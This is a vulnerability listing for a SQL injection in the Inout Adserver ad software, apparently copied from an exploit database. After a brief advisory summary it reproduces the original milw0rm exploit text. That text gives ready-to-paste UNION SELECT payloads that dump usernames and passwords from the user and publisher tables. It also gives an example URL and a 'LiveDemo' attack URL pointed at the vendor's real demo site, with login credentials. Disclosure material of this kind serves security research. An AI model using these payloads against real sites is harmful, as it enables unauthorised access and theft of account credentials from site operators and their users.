Inout Adserver (id) Remote SQL injection

vendor:

Inout Adserver

by:

boom3rang

7.5

CVSS

HIGH

Remote SQL injection

CWE

Product Name: Inout Adserver

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Inout Adserver (id) Remote SQL injection

The Inout Adserver software is affected by a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted request to the 'ppc-add-keywords.php' script, with a malicious SQL query in the 'id' parameter. Successful exploitation of this vulnerability allows the attacker to retrieve sensitive information from the database, such as usernames and passwords of users and publishers. This vulnerability can be exploited by authenticated users who have created an advertiser account on the targeted website.

Mitigation:

The vendor has not released a patch or mitigation for this vulnerability. It is recommended to discontinue the use of Inout Adserver software and consider using an alternative solution.

Source

Exploit-DB raw data:

# Inout Adserver (id) Remote SQL injection                         [_][-][X]
      _  ___  _  ___      ___ ___ _____      __  ___ __   __  ___       
     | |/ / || |/ __|___ / __| _ \ __\ \    / / |_  )  \ /  \/ _ \      
     | ' <| __ | (_ |___| (__|   / _| \ \/\/ /   / / () | () \_, /      
     |_|\_\_||_|\___|    \___|_|_\___| \_/\_/   /___\__/ \__/ /_/       
                                                                          
                                                                        
      Red n'black i dress eagle on my chest.
      It's good to be an ALBANIAN Keep my head up high for that flag i die.
      Im proud to be an ALBANIAN
   ########################################################################   

       Author             : boom3rang                              
       Contact            : boom3rang[at]live.com                         
       Greetz             : H!tm@N - KHG - cHs

                  R.I.P redc00de                 
   ------------------------------------------------------------------------

                  Affected software description    	                  
       Software 	: Inout Adserver            	                          
       Vendor		: http://www.inoutscripts.com/products/adserver/	           
       Price 	      	: Just $99.95          
       Version Vuln.   : /		
 
   ------------------------------------------------------------------------

                 Proof Of Concept!
               --------------------

= NOTE!! =
########################################################################################
First you need to create an Advertiser account to the site, it's free, then you need "login" to execute this exploit!
########################################################################################

Dork: N/W
---------------------------------------------------------------------------------------
SQLi:
http://localhost/PATH/ppc-add-keywords.php?id= [ Exploit ]
---------------------------------------------------------------------------------------
Exploit: 
   1+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_users--

   1+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_publishers--
---------------------------------------------------------------------------------------

Example:
http://localhost/PATH/ppc-add-keywords.php?id=1+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_users--

---------------------------------------------------------------------------------------

LiveDemo:

Advertiser Demo Login!   
Username : advertiser
Password : advertiser 

http://www.inoutscripts.com/demo/inout_adserver/ppc-add-keywords.php?id=348+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_users--

# milw0rm.com [2009-07-27]